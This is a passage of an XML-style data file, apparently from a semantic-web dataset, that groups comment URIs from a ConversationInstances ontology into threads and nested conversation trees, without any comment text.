http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297310
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285250
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_23</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279710
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_57</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278624
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288578
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_48</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281990
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_64</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278996
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_47</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280876
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_38</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279304
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280284
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291588
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_54</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292100
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283686
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284528
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30307604
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_22</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279538
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_39</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278970
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279512
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_21</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281360
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_72</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297222
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281200
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_46</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279666
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_69</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279994
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_51</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279964
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_36</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280520
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283156
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_41</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279920
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278628
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280060
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280404
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_27</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279880
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_20</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281576
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_68</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278900
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283244
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_62</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279144
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282054
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_33</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281328
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_58</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280892
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_61</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278708
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278812
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_40</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280960
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278768
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282544
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_63</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284586
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_26</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281648
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_30</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30286462
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_25</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280400
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278624
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283094
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_55</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278990
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_60</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278654
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288340
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_31</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278682
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279290
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_45</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279892
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281112
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283140
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_50</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280118
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_19</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283154
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_52</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292932
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_24</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281474
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283386
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_37</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279762
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_70</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279028
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_53</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280088
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_44</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30295936
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279914
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_67</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291502
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_43</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283196
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_34</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278890
</commentlist>
</thread>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.29</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278654
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288340
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.23</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280748
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.21</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279992
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278628
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280060
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279236
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278780
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278860
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278832
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.28</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282848
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.19</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278970
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279512
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281874
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30286462
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280088
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.26</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278624
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288578
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283094
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278768
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282544
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278708
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278812
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_12_01_0025213.5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284528
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281990
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281648
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283154
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281360
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292932
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281928
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283196
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279538
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291502
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279964
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281182
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283140
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30295936
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956
-----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287906
-----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297310
-----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297222
